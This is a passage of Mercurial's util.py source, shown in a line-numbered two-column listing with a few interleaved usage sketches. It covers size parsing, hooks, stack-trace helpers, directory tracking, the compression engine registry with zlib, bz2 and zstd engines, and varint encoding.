2929 2927 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2930 2928 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2931 2929
2932 2930 def sizetoint(s):
2933 2931 '''Convert a space specifier to a byte count.
2934 2932
2935 2933 >>> sizetoint(b'30')
2936 2934 30
2937 2935 >>> sizetoint(b'2.2kb')
2938 2936 2252
2939 2937 >>> sizetoint(b'6M')
2940 2938 6291456
2941 2939 '''
2942 2940 t = s.strip().lower()
2943 2941 try:
2944 2942 for k, u in _sizeunits:
2945 2943 if t.endswith(k):
2946 2944 return int(float(t[:-len(k)]) * u)
2947 2945 return int(t)
2948 2946 except ValueError:
2949 2947 raise error.ParseError(_("couldn't parse size: %s") % s)
2950 2948
2951 2949 class hooks(object):
2952 2950 '''A collection of hook functions that can be used to extend a
2953 2951 function's behavior. Hooks are called in lexicographic order,
2954 2952 based on the names of their sources.'''
2955 2953
2956 2954 def __init__(self):
2957 2955 self._hooks = []
2958 2956
2959 2957 def add(self, source, hook):
2960 2958 self._hooks.append((source, hook))
2961 2959
2962 2960 def __call__(self, *args):
2963 2961 self._hooks.sort(key=lambda x: x[0])
2964 2962 results = []
2965 2963 for source, hook in self._hooks:
2966 2964 results.append(hook(*args))
2967 2965 return results
2968 2966
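# A minimal sketch of the hooks collection ('_demo_hooks' and the source
# names are illustrative). Hooks run in lexicographic source order.
def _demo_hooks():
    h = hooks()
    h.add('b-ext', lambda v: v * 2)
    h.add('a-core', lambda v: v + 1)
    # 'a-core' runs before 'b-ext' -> [4, 6]
    return h(3)
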
2969 2967 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2970 2968 '''Yields lines for a nicely formatted stacktrace.
2971 2969 Skips the 'skip' last entries, then returns the last 'depth' entries.
2972 2970 Each file+linenumber is formatted according to fileline.
2973 2971 Each line is formatted according to line.
2974 2972 If line is None, it yields:
2975 2973 length of longest filepath+line number,
2976 2974 filepath+linenumber,
2977 2975 function
2978 2976
2979 2977 Not to be used in production code, but very convenient while developing.
2980 2978 '''
2981 2979 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2982 2980 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2983 2981 ][-depth:]
2984 2982 if entries:
2985 2983 fnmax = max(len(entry[0]) for entry in entries)
2986 2984 for fnln, func in entries:
2987 2985 if line is None:
2988 2986 yield (fnmax, fnln, func)
2989 2987 else:
2990 2988 yield line % (fnmax, fnln, func)
2991 2989
2992 2990 def debugstacktrace(msg='stacktrace', skip=0,
2993 2991 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2994 2992 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2995 2993 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
2996 2994 By default it will flush stdout first.
2997 2995 It can be used everywhere and intentionally does not require an ui object.
2998 2996 Not to be used in production code, but very convenient while developing.
2999 2997 '''
3000 2998 if otherf:
3001 2999 otherf.flush()
3002 3000 f.write('%s at:\n' % msg.rstrip())
3003 3001 for line in getstackframes(skip + 1, depth=depth):
3004 3002 f.write(line)
3005 3003 f.flush()
3006 3004
3007 3005 class dirs(object):
3008 3006 '''a multiset of directory names from a dirstate or manifest'''
3009 3007
3010 3008 def __init__(self, map, skip=None):
3011 3009 self._dirs = {}
3012 3010 addpath = self.addpath
3013 3011 if safehasattr(map, 'iteritems') and skip is not None:
3014 3012 for f, s in map.iteritems():
3015 3013 if s[0] != skip:
3016 3014 addpath(f)
3017 3015 else:
3018 3016 for f in map:
3019 3017 addpath(f)
3020 3018
3021 3019 def addpath(self, path):
3022 3020 dirs = self._dirs
3023 3021 for base in finddirs(path):
3024 3022 if base in dirs:
3025 3023 dirs[base] += 1
3026 3024 return
3027 3025 dirs[base] = 1
3028 3026
3029 3027 def delpath(self, path):
3030 3028 dirs = self._dirs
3031 3029 for base in finddirs(path):
3032 3030 if dirs[base] > 1:
3033 3031 dirs[base] -= 1
3034 3032 return
3035 3033 del dirs[base]
3036 3034
3037 3035 def __iter__(self):
3038 3036 return iter(self._dirs)
3039 3037
3040 3038 def __contains__(self, d):
3041 3039 return d in self._dirs
3042 3040
3043 3041 if safehasattr(parsers, 'dirs'):
3044 3042 dirs = parsers.dirs
3045 3043
3046 3044 def finddirs(path):
3047 3045 pos = path.rfind('/')
3048 3046 while pos != -1:
3049 3047 yield path[:pos]
3050 3048 pos = path.rfind('/', 0, pos)
3051 3049
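# A minimal sketch: finddirs() yields ancestor directories, deepest first
# ('_demo_finddirs' is a hypothetical helper).
def _demo_finddirs():
    # -> ['a/b/c', 'a/b', 'a']
    return list(finddirs('a/b/c/d'))
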
3052 3050 # compression code
3053 3051
3054 3052 SERVERROLE = 'server'
3055 3053 CLIENTROLE = 'client'
3056 3054
3057 3055 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3058 3056 (u'name', u'serverpriority',
3059 3057 u'clientpriority'))
3060 3058
3061 3059 class compressormanager(object):
3062 3060 """Holds registrations of various compression engines.
3063 3061
3064 3062 This class essentially abstracts the differences between compression
3065 3063 engines to allow new compression formats to be added easily, possibly from
3066 3064 extensions.
3067 3065
3068 3066 Compressors are registered against the global instance by calling its
3069 3067 ``register()`` method.
3070 3068 """
3071 3069 def __init__(self):
3072 3070 self._engines = {}
3073 3071 # Bundle spec human name to engine name.
3074 3072 self._bundlenames = {}
3075 3073 # Internal bundle identifier to engine name.
3076 3074 self._bundletypes = {}
3077 3075 # Revlog header to engine name.
3078 3076 self._revlogheaders = {}
3079 3077 # Wire proto identifier to engine name.
3080 3078 self._wiretypes = {}
3081 3079
3082 3080 def __getitem__(self, key):
3083 3081 return self._engines[key]
3084 3082
3085 3083 def __contains__(self, key):
3086 3084 return key in self._engines
3087 3085
3088 3086 def __iter__(self):
3089 3087 return iter(self._engines.keys())
3090 3088
3091 3089 def register(self, engine):
3092 3090 """Register a compression engine with the manager.
3093 3091
3094 3092 The argument must be a ``compressionengine`` instance.
3095 3093 """
3096 3094 if not isinstance(engine, compressionengine):
3097 3095 raise ValueError(_('argument must be a compressionengine'))
3098 3096
3099 3097 name = engine.name()
3100 3098
3101 3099 if name in self._engines:
3102 3100 raise error.Abort(_('compression engine %s already registered') %
3103 3101 name)
3104 3102
3105 3103 bundleinfo = engine.bundletype()
3106 3104 if bundleinfo:
3107 3105 bundlename, bundletype = bundleinfo
3108 3106
3109 3107 if bundlename in self._bundlenames:
3110 3108 raise error.Abort(_('bundle name %s already registered') %
3111 3109 bundlename)
3112 3110 if bundletype in self._bundletypes:
3113 3111 raise error.Abort(_('bundle type %s already registered by %s') %
3114 3112 (bundletype, self._bundletypes[bundletype]))
3115 3113
3116 3114 # Register the external facing name only if one was declared.
3117 3115 if bundlename:
3118 3116 self._bundlenames[bundlename] = name
3119 3117
3120 3118 self._bundletypes[bundletype] = name
3121 3119
3122 3120 wiresupport = engine.wireprotosupport()
3123 3121 if wiresupport:
3124 3122 wiretype = wiresupport.name
3125 3123 if wiretype in self._wiretypes:
3126 3124 raise error.Abort(_('wire protocol compression %s already '
3127 3125 'registered by %s') %
3128 3126 (wiretype, self._wiretypes[wiretype]))
3129 3127
3130 3128 self._wiretypes[wiretype] = name
3131 3129
3132 3130 revlogheader = engine.revlogheader()
3133 3131 if revlogheader and revlogheader in self._revlogheaders:
3134 3132 raise error.Abort(_('revlog header %s already registered by %s') %
3135 3133 (revlogheader, self._revlogheaders[revlogheader]))
3136 3134
3137 3135 if revlogheader:
3138 3136 self._revlogheaders[revlogheader] = name
3139 3137
3140 3138 self._engines[name] = engine
3141 3139
3142 3140 @property
3143 3141 def supportedbundlenames(self):
3144 3142 return set(self._bundlenames.keys())
3145 3143
3146 3144 @property
3147 3145 def supportedbundletypes(self):
3148 3146 return set(self._bundletypes.keys())
3149 3147
3150 3148 def forbundlename(self, bundlename):
3151 3149 """Obtain a compression engine registered to a bundle name.
3152 3150
3153 3151 Will raise KeyError if the bundle type isn't registered.
3154 3152
3155 3153 Will abort if the engine is known but not available.
3156 3154 """
3157 3155 engine = self._engines[self._bundlenames[bundlename]]
3158 3156 if not engine.available():
3159 3157 raise error.Abort(_('compression engine %s could not be loaded') %
3160 3158 engine.name())
3161 3159 return engine
3162 3160
3163 3161 def forbundletype(self, bundletype):
3164 3162 """Obtain a compression engine registered to a bundle type.
3165 3163
3166 3164 Will raise KeyError if the bundle type isn't registered.
3167 3165
3168 3166 Will abort if the engine is known but not available.
3169 3167 """
3170 3168 engine = self._engines[self._bundletypes[bundletype]]
3171 3169 if not engine.available():
3172 3170 raise error.Abort(_('compression engine %s could not be loaded') %
3173 3171 engine.name())
3174 3172 return engine
3175 3173
3176 3174 def supportedwireengines(self, role, onlyavailable=True):
3177 3175 """Obtain compression engines that support the wire protocol.
3178 3176
3179 3177 Returns a list of engines in prioritized order, most desired first.
3180 3178
3181 3179 If ``onlyavailable`` is set, filter out engines that can't be
3182 3180 loaded.
3183 3181 """
3184 3182 assert role in (SERVERROLE, CLIENTROLE)
3185 3183
3186 3184 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3187 3185
3188 3186 engines = [self._engines[e] for e in self._wiretypes.values()]
3189 3187 if onlyavailable:
3190 3188 engines = [e for e in engines if e.available()]
3191 3189
3192 3190 def getkey(e):
3193 3191 # Sort first by priority, highest first. In case of tie, sort
3194 3192 # alphabetically. This is arbitrary, but ensures output is
3195 3193 # stable.
3196 3194 w = e.wireprotosupport()
3197 3195 return -1 * getattr(w, attr), w.name
3198 3196
3199 3197 return list(sorted(engines, key=getkey))
3200 3198
3201 3199 def forwiretype(self, wiretype):
3202 3200 engine = self._engines[self._wiretypes[wiretype]]
3203 3201 if not engine.available():
3204 3202 raise error.Abort(_('compression engine %s could not be loaded') %
3205 3203 engine.name())
3206 3204 return engine
3207 3205
3208 3206 def forrevlogheader(self, header):
3209 3207 """Obtain a compression engine registered to a revlog header.
3210 3208
3211 3209 Will raise KeyError if the revlog header value isn't registered.
3212 3210 """
3213 3211 return self._engines[self._revlogheaders[header]]
3214 3212
3215 3213 compengines = compressormanager()
3216 3214
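# A minimal sketch of querying the global registry ('_demo_compengines' is
# a hypothetical helper; the 'gzip' name is registered by _zlibengine
# further below).
def _demo_compengines():
    # maps a bundle spec name to an engine, aborting if it can't be loaded
    engine = compengines.forbundlename('gzip')
    return engine.name(), compengines.supportedbundlenames
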
3217 3215 class compressionengine(object):
3218 3216 """Base class for compression engines.
3219 3217
3220 3218 Compression engines must implement the interface defined by this class.
3221 3219 """
3222 3220 def name(self):
3223 3221 """Returns the name of the compression engine.
3224 3222
3225 3223 This is the key the engine is registered under.
3226 3224
3227 3225 This method must be implemented.
3228 3226 """
3229 3227 raise NotImplementedError()
3230 3228
3231 3229 def available(self):
3232 3230 """Whether the compression engine is available.
3233 3231
3234 3232 The intent of this method is to allow optional compression engines
3235 3233 that may not be available in all installations (such as engines relying
3236 3234 on C extensions that may not be present).
3237 3235 """
3238 3236 return True
3239 3237
3240 3238 def bundletype(self):
3241 3239 """Describes bundle identifiers for this engine.
3242 3240
3243 3241 If this compression engine isn't supported for bundles, returns None.
3244 3242
3245 3243 If this engine can be used for bundles, returns a 2-tuple of strings of
3246 3244 the user-facing "bundle spec" compression name and an internal
3247 3245 identifier used to denote the compression format within bundles. To
3248 3246 exclude the name from external usage, set the first element to ``None``.
3249 3247
3250 3248 If bundle compression is supported, the class must also implement
3251 3249 ``compressstream`` and ``decompressorreader``.
3252 3250
3253 3251 The docstring of this method is used in the help system to tell users
3254 3252 about this engine.
3255 3253 """
3256 3254 return None
3257 3255
3258 3256 def wireprotosupport(self):
3259 3257 """Declare support for this compression format on the wire protocol.
3260 3258
3261 3259 If this compression engine isn't supported for compressing wire
3262 3260 protocol payloads, returns None.
3263 3261
3264 3262 Otherwise, returns ``compenginewireprotosupport`` with the following
3265 3263 fields:
3266 3264
3267 3265 * String format identifier
3268 3266 * Integer priority for the server
3269 3267 * Integer priority for the client
3270 3268
3271 3269 The integer priorities are used to order the advertisement of format
3272 3270 support by server and client. The highest integer is advertised
3273 3271 first. Integers with non-positive values aren't advertised.
3274 3272
3275 3273 The priority values are somewhat arbitrary and only used for default
3276 3274 ordering. The relative order can be changed via config options.
3277 3275
3278 3276 If wire protocol compression is supported, the class must also implement
3279 3277 ``compressstream`` and ``decompressorreader``.
3280 3278 """
3281 3279 return None
3282 3280
3283 3281 def revlogheader(self):
3284 3282 """Header added to revlog chunks that identifies this engine.
3285 3283
3286 3284 If this engine can be used to compress revlogs, this method should
3287 3285 return the bytes used to identify chunks compressed with this engine.
3288 3286 Else, the method should return ``None`` to indicate it does not
3289 3287 participate in revlog compression.
3290 3288 """
3291 3289 return None
3292 3290
3293 3291 def compressstream(self, it, opts=None):
3294 3292 """Compress an iterator of chunks.
3295 3293
3296 3294 The method receives an iterator (ideally a generator) of chunks of
3297 3295 bytes to be compressed. It returns an iterator (ideally a generator)
3298 3296 of bytes of chunks representing the compressed output.
3299 3297
3300 3298 Optionally accepts an argument defining how to perform compression.
3301 3299 Each engine treats this argument differently.
3302 3300 """
3303 3301 raise NotImplementedError()
3304 3302
3305 3303 def decompressorreader(self, fh):
3306 3304 """Perform decompression on a file object.
3307 3305
3308 3306 Argument is an object with a ``read(size)`` method that returns
3309 3307 compressed data. Return value is an object with a ``read(size)`` that
3310 3308 returns uncompressed data.
3311 3309 """
3312 3310 raise NotImplementedError()
3313 3311
3314 3312 def revlogcompressor(self, opts=None):
3315 3313 """Obtain an object that can be used to compress revlog entries.
3316 3314
3317 3315 The object has a ``compress(data)`` method that compresses binary
3318 3316 data. This method returns compressed binary data or ``None`` if
3319 3317 the data could not be compressed (too small, not compressible, etc).
3320 3318 The returned data should have a header uniquely identifying this
3321 3319 compression format so decompression can be routed to this engine.
3322 3320 This header should be identified by the ``revlogheader()`` return
3323 3321 value.
3324 3322
3325 3323 The object has a ``decompress(data)`` method that decompresses
3326 3324 data. The method will only be called if ``data`` begins with
3327 3325 ``revlogheader()``. The method should return the raw, uncompressed
3328 3326 data or raise a ``RevlogError``.
3329 3327
3330 3328 The object is reusable but is not thread safe.
3331 3329 """
3332 3330 raise NotImplementedError()
3333 3331
3334 3332 class _zlibengine(compressionengine):
3335 3333 def name(self):
3336 3334 return 'zlib'
3337 3335
3338 3336 def bundletype(self):
3339 3337 """zlib compression using the DEFLATE algorithm.
3340 3338
3341 3339 All Mercurial clients should support this format. The compression
3342 3340 algorithm strikes a reasonable balance between compression ratio
3343 3341 and size.
3344 3342 """
3345 3343 return 'gzip', 'GZ'
3346 3344
3347 3345 def wireprotosupport(self):
3348 3346 return compewireprotosupport('zlib', 20, 20)
3349 3347
3350 3348 def revlogheader(self):
3351 3349 return 'x'
3352 3350
3353 3351 def compressstream(self, it, opts=None):
3354 3352 opts = opts or {}
3355 3353
3356 3354 z = zlib.compressobj(opts.get('level', -1))
3357 3355 for chunk in it:
3358 3356 data = z.compress(chunk)
3359 3357 # Not all calls to compress emit data. It is cheaper to inspect
3360 3358 # here than to feed empty chunks through the generator.
3361 3359 if data:
3362 3360 yield data
3363 3361
3364 3362 yield z.flush()
3365 3363
3366 3364 def decompressorreader(self, fh):
3367 3365 def gen():
3368 3366 d = zlib.decompressobj()
3369 3367 for chunk in filechunkiter(fh):
3370 3368 while chunk:
3371 3369 # Limit output size to limit memory.
3372 3370 yield d.decompress(chunk, 2 ** 18)
3373 3371 chunk = d.unconsumed_tail
3374 3372
3375 3373 return chunkbuffer(gen())
3376 3374
3377 3375 class zlibrevlogcompressor(object):
3378 3376 def compress(self, data):
3379 3377 insize = len(data)
3380 3378 # Caller handles empty input case.
3381 3379 assert insize > 0
3382 3380
3383 3381 if insize < 44:
3384 3382 return None
3385 3383
3386 3384 elif insize <= 1000000:
3387 3385 compressed = zlib.compress(data)
3388 3386 if len(compressed) < insize:
3389 3387 return compressed
3390 3388 return None
3391 3389
3392 3390 # zlib makes an internal copy of the input buffer, doubling
3393 3391 # memory usage for large inputs. So do streaming compression
3394 3392 # on large inputs.
3395 3393 else:
3396 3394 z = zlib.compressobj()
3397 3395 parts = []
3398 3396 pos = 0
3399 3397 while pos < insize:
3400 3398 pos2 = pos + 2**20
3401 3399 parts.append(z.compress(data[pos:pos2]))
3402 3400 pos = pos2
3403 3401 parts.append(z.flush())
3404 3402
3405 3403 if sum(map(len, parts)) < insize:
3406 3404 return ''.join(parts)
3407 3405 return None
3408 3406
3409 3407 def decompress(self, data):
3410 3408 try:
3411 3409 return zlib.decompress(data)
3412 3410 except zlib.error as e:
3413 3411 raise error.RevlogError(_('revlog decompress error: %s') %
3414 3412 stringutil.forcebytestr(e))
3415 3413
3416 3414 def revlogcompressor(self, opts=None):
3417 3415 return self.zlibrevlogcompressor()
3418 3416
3419 3417 compengines.register(_zlibengine())
3420 3418
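# A minimal round-trip sketch using the zlib engine's streaming APIs
# ('_demo_zlibroundtrip' is a hypothetical helper; io.BytesIO stands in
# for a real file object).
def _demo_zlibroundtrip(data):
    import io
    engine = compengines['zlib']
    compressed = ''.join(engine.compressstream(iter([data])))
    reader = engine.decompressorreader(io.BytesIO(compressed))
    return reader.read(len(data)) == data
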
3421 3419 class _bz2engine(compressionengine):
3422 3420 def name(self):
3423 3421 return 'bz2'
3424 3422
3425 3423 def bundletype(self):
3426 3424 """An algorithm that produces smaller bundles than ``gzip``.
3427 3425
3428 3426 All Mercurial clients should support this format.
3429 3427
3430 3428 This engine will likely produce smaller bundles than ``gzip`` but
3431 3429 will be significantly slower, both during compression and
3432 3430 decompression.
3433 3431
3434 3432 If available, the ``zstd`` engine can yield similar or better
3435 3433 compression at much higher speeds.
3436 3434 """
3437 3435 return 'bzip2', 'BZ'
3438 3436
3439 3437 # We declare a protocol name but don't advertise by default because
3440 3438 # it is slow.
3441 3439 def wireprotosupport(self):
3442 3440 return compewireprotosupport('bzip2', 0, 0)
3443 3441
3444 3442 def compressstream(self, it, opts=None):
3445 3443 opts = opts or {}
3446 3444 z = bz2.BZ2Compressor(opts.get('level', 9))
3447 3445 for chunk in it:
3448 3446 data = z.compress(chunk)
3449 3447 if data:
3450 3448 yield data
3451 3449
3452 3450 yield z.flush()
3453 3451
3454 3452 def decompressorreader(self, fh):
3455 3453 def gen():
3456 3454 d = bz2.BZ2Decompressor()
3457 3455 for chunk in filechunkiter(fh):
3458 3456 yield d.decompress(chunk)
3459 3457
3460 3458 return chunkbuffer(gen())
3461 3459
3462 3460 compengines.register(_bz2engine())
3463 3461
3464 3462 class _truncatedbz2engine(compressionengine):
3465 3463 def name(self):
3466 3464 return 'bz2truncated'
3467 3465
3468 3466 def bundletype(self):
3469 3467 return None, '_truncatedBZ'
3470 3468
3471 3469 # We don't implement compressstream because it is hackily handled elsewhere.
3472 3470
3473 3471 def decompressorreader(self, fh):
3474 3472 def gen():
3475 3473 # The input stream doesn't have the 'BZ' header. So add it back.
3476 3474 d = bz2.BZ2Decompressor()
3477 3475 d.decompress('BZ')
3478 3476 for chunk in filechunkiter(fh):
3479 3477 yield d.decompress(chunk)
3480 3478
3481 3479 return chunkbuffer(gen())
3482 3480
3483 3481 compengines.register(_truncatedbz2engine())
3484 3482
3485 3483 class _noopengine(compressionengine):
3486 3484 def name(self):
3487 3485 return 'none'
3488 3486
3489 3487 def bundletype(self):
3490 3488 """No compression is performed.
3491 3489
3492 3490 Use this compression engine to explicitly disable compression.
3493 3491 """
3494 3492 return 'none', 'UN'
3495 3493
3496 3494 # Clients always support uncompressed payloads. Servers don't because
3497 3495 # unless you are on a fast network, uncompressed payloads can easily
3498 3496 # saturate your network pipe.
3499 3497 def wireprotosupport(self):
3500 3498 return compewireprotosupport('none', 0, 10)
3501 3499
3502 3500 # We don't implement revlogheader because it is handled specially
3503 3501 # in the revlog class.
3504 3502
3505 3503 def compressstream(self, it, opts=None):
3506 3504 return it
3507 3505
3508 3506 def decompressorreader(self, fh):
3509 3507 return fh
3510 3508
3511 3509 class nooprevlogcompressor(object):
3512 3510 def compress(self, data):
3513 3511 return None
3514 3512
3515 3513 def revlogcompressor(self, opts=None):
3516 3514 return self.nooprevlogcompressor()
3517 3515
3518 3516 compengines.register(_noopengine())
3519 3517
3520 3518 class _zstdengine(compressionengine):
3521 3519 def name(self):
3522 3520 return 'zstd'
3523 3521
3524 3522 @propertycache
3525 3523 def _module(self):
3526 3524 # Not all installs have the zstd module available. So defer importing
3527 3525 # until first access.
3528 3526 try:
3529 3527 from . import zstd
3530 3528 # Force delayed import.
3531 3529 zstd.__version__
3532 3530 return zstd
3533 3531 except ImportError:
3534 3532 return None
3535 3533
3536 3534 def available(self):
3537 3535 return bool(self._module)
3538 3536
3539 3537 def bundletype(self):
3540 3538 """A modern compression algorithm that is fast and highly flexible.
3541 3539
3542 3540 Only supported by Mercurial 4.1 and newer clients.
3543 3541
3544 3542 With the default settings, zstd compression is both faster and yields
3545 3543 better compression than ``gzip``. It also frequently yields better
3546 3544 compression than ``bzip2`` while operating at much higher speeds.
3547 3545
3548 3546 If this engine is available and backwards compatibility is not a
3549 3547 concern, it is likely the best available engine.
3550 3548 """
3551 3549 return 'zstd', 'ZS'
3552 3550
3553 3551 def wireprotosupport(self):
3554 3552 return compewireprotosupport('zstd', 50, 50)
3555 3553
3556 3554 def revlogheader(self):
3557 3555 return '\x28'
3558 3556
3559 3557 def compressstream(self, it, opts=None):
3560 3558 opts = opts or {}
3561 3559 # zstd level 3 is almost always significantly faster than zlib
3562 3560 # while providing no worse compression. It strikes a good balance
3563 3561 # between speed and compression.
3564 3562 level = opts.get('level', 3)
3565 3563
3566 3564 zstd = self._module
3567 3565 z = zstd.ZstdCompressor(level=level).compressobj()
3568 3566 for chunk in it:
3569 3567 data = z.compress(chunk)
3570 3568 if data:
3571 3569 yield data
3572 3570
3573 3571 yield z.flush()
3574 3572
3575 3573 def decompressorreader(self, fh):
3576 3574 zstd = self._module
3577 3575 dctx = zstd.ZstdDecompressor()
3578 3576 return chunkbuffer(dctx.read_from(fh))
3579 3577
3580 3578 class zstdrevlogcompressor(object):
3581 3579 def __init__(self, zstd, level=3):
3582 3580 # TODO consider omitting frame magic to save 4 bytes.
3583 3581 # This writes content sizes into the frame header. That is
3584 3582 # extra storage. But it allows a correct size memory allocation
3585 3583 # to hold the result.
3586 3584 self._cctx = zstd.ZstdCompressor(level=level)
3587 3585 self._dctx = zstd.ZstdDecompressor()
3588 3586 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3589 3587 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3590 3588
3591 3589 def compress(self, data):
3592 3590 insize = len(data)
3593 3591 # Caller handles empty input case.
3594 3592 assert insize > 0
3595 3593
3596 3594 if insize < 50:
3597 3595 return None
3598 3596
3599 3597 elif insize <= 1000000:
3600 3598 compressed = self._cctx.compress(data)
3601 3599 if len(compressed) < insize:
3602 3600 return compressed
3603 3601 return None
3604 3602 else:
3605 3603 z = self._cctx.compressobj()
3606 3604 chunks = []
3607 3605 pos = 0
3608 3606 while pos < insize:
3609 3607 pos2 = pos + self._compinsize
3610 3608 chunk = z.compress(data[pos:pos2])
3611 3609 if chunk:
3612 3610 chunks.append(chunk)
3613 3611 pos = pos2
3614 3612 chunks.append(z.flush())
3615 3613
3616 3614 if sum(map(len, chunks)) < insize:
3617 3615 return ''.join(chunks)
3618 3616 return None
3619 3617
3620 3618 def decompress(self, data):
3621 3619 insize = len(data)
3622 3620
3623 3621 try:
3624 3622 # This was measured to be faster than other streaming
3625 3623 # decompressors.
3626 3624 dobj = self._dctx.decompressobj()
3627 3625 chunks = []
3628 3626 pos = 0
3629 3627 while pos < insize:
3630 3628 pos2 = pos + self._decompinsize
3631 3629 chunk = dobj.decompress(data[pos:pos2])
3632 3630 if chunk:
3633 3631 chunks.append(chunk)
3634 3632 pos = pos2
3635 3633 # Frame should be exhausted, so no finish() API.
3636 3634
3637 3635 return ''.join(chunks)
3638 3636 except Exception as e:
3639 3637 raise error.RevlogError(_('revlog decompress error: %s') %
3640 3638 stringutil.forcebytestr(e))
3641 3639
3642 3640 def revlogcompressor(self, opts=None):
3643 3641 opts = opts or {}
3644 3642 return self.zstdrevlogcompressor(self._module,
3645 3643 level=opts.get('level', 3))
3646 3644
3647 3645 compengines.register(_zstdengine())
3648 3646
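The streaming pattern in ``_zstdengine.compressstream`` above translates directly to the standalone python-zstandard package (the upstream of the module Mercurial vendors as ``mercurial.zstd``). A minimal sketch, assuming that package is installed:

    import zstandard as zstd

    def compressstream(chunks, level=3):
        # One compressobj per stream; emit compressed data as it becomes
        # available and flush once the input is exhausted.
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in chunks:
            data = z.compress(chunk)
            if data:
                yield data
        yield z.flush()

    compressed = b''.join(compressstream([b'hello ', b'world'] * 1000))
    # decompressobj() handles frames without an embedded content size,
    # which is what a streamed compressobj produces.
    plain = zstd.ZstdDecompressor().decompressobj().decompress(compressed)
    assert plain == b'hello world' * 1000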
3649 3647 def bundlecompressiontopics():
3650 3648 """Obtains a list of available bundle compressions for use in help."""
3651 3649 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3652 3650 items = {}
3653 3651
3654 3652 # We need to format the docstring. So use a dummy object/type to hold it
3655 3653 # rather than mutating the original.
3656 3654 class docobject(object):
3657 3655 pass
3658 3656
3659 3657 for name in compengines:
3660 3658 engine = compengines[name]
3661 3659
3662 3660 if not engine.available():
3663 3661 continue
3664 3662
3665 3663 bt = engine.bundletype()
3666 3664 if not bt or not bt[0]:
3667 3665 continue
3668 3666
3669 3667 doc = pycompat.sysstr('``%s``\n %s') % (
3670 3668 bt[0], engine.bundletype.__doc__)
3671 3669
3672 3670 value = docobject()
3673 3671 value.__doc__ = doc
3674 3672 value._origdoc = engine.bundletype.__doc__
3675 3673 value._origfunc = engine.bundletype
3676 3674
3677 3675 items[bt[0]] = value
3678 3676
3679 3677 return items
3680 3678
3681 3679 i18nfunctions = bundlecompressiontopics().values()
3682 3680
3683 3681 # convenient shortcut
3684 3682 dst = debugstacktrace
3685 3683
3686 3684 def safename(f, tag, ctx, others=None):
3687 3685 """
3688 3686 Generate a name that it is safe to rename f to in the given context.
3689 3687
3690 3688 f: filename to rename
3691 3689 tag: a string tag that will be included in the new name
3692 3690 ctx: a context, in which the new name must not exist
3693 3691 others: a set of other filenames that the new name must not be in
3694 3692
3695 3693 Returns a file name of the form oldname~tag[~number] which does not exist
3696 3694 in the provided context and is not in the set of other names.
3697 3695 """
3698 3696 if others is None:
3699 3697 others = set()
3700 3698
3701 3699 fn = '%s~%s' % (f, tag)
3702 3700 if fn not in ctx and fn not in others:
3703 3701 return fn
3704 3702 for n in itertools.count(1):
3705 3703 fn = '%s~%s~%s' % (f, tag, n)
3706 3704 if fn not in ctx and fn not in others:
3707 3705 return fn
3708 3706
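For illustration, ``safename`` only needs membership tests on ``ctx`` and ``others``, so plain sets work as stand-ins for a real changectx (a hypothetical setup, not how callers actually invoke it):

    taken = {'a.txt~base', 'a.txt~base~1'}
    assert safename('a.txt', 'base', ctx=set(), others=taken) == 'a.txt~base~2'
    assert safename('b.txt', 'base', ctx=set()) == 'b.txt~base'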
3709 3707 def readexactly(stream, n):
3710 3708 '''read n bytes from stream.read and abort if less was available'''
3711 3709 s = stream.read(n)
3712 3710 if len(s) < n:
3713 3711 raise error.Abort(_("stream ended unexpectedly"
3714 3712 " (got %d bytes, expected %d)")
3715 3713 % (len(s), n))
3716 3714 return s
3717 3715
3718 3716 def uvarintencode(value):
3719 3717 """Encode an unsigned integer value to a varint.
3720 3718
3721 3719 A varint is a variable length integer of 1 or more bytes. Each byte
3722 3720 except the last has the most significant bit set. The lower 7 bits of
3723 3721 each byte store the 2's complement representation, least significant group
3724 3722 first.
3725 3723
3726 3724 >>> uvarintencode(0)
3727 3725 '\\x00'
3728 3726 >>> uvarintencode(1)
3729 3727 '\\x01'
3730 3728 >>> uvarintencode(127)
3731 3729 '\\x7f'
3732 3730 >>> uvarintencode(1337)
3733 3731 '\\xb9\\n'
3734 3732 >>> uvarintencode(65536)
3735 3733 '\\x80\\x80\\x04'
3736 3734 >>> uvarintencode(-1)
3737 3735 Traceback (most recent call last):
3738 3736 ...
3739 3737 ProgrammingError: negative value for uvarint: -1
3740 3738 """
3741 3739 if value < 0:
3742 3740 raise error.ProgrammingError('negative value for uvarint: %d'
3743 3741 % value)
3744 3742 bits = value & 0x7f
3745 3743 value >>= 7
3746 3744 bytes = []
3747 3745 while value:
3748 3746 bytes.append(pycompat.bytechr(0x80 | bits))
3749 3747 bits = value & 0x7f
3750 3748 value >>= 7
3751 3749 bytes.append(pycompat.bytechr(bits))
3752 3750
3753 3751 return ''.join(bytes)
3754 3752
3755 3753 def uvarintdecodestream(fh):
3756 3754 """Decode an unsigned variable length integer from a stream.
3757 3755
3758 3756 The passed argument is anything that has a ``.read(N)`` method.
3759 3757
3760 3758 >>> try:
3761 3759 ... from StringIO import StringIO as BytesIO
3762 3760 ... except ImportError:
3763 3761 ... from io import BytesIO
3764 3762 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3765 3763 0
3766 3764 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3767 3765 1
3768 3766 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3769 3767 127
3770 3768 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3771 3769 1337
3772 3770 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3773 3771 65536
3774 3772 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3775 3773 Traceback (most recent call last):
3776 3774 ...
3777 3775 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3778 3776 """
3779 3777 result = 0
3780 3778 shift = 0
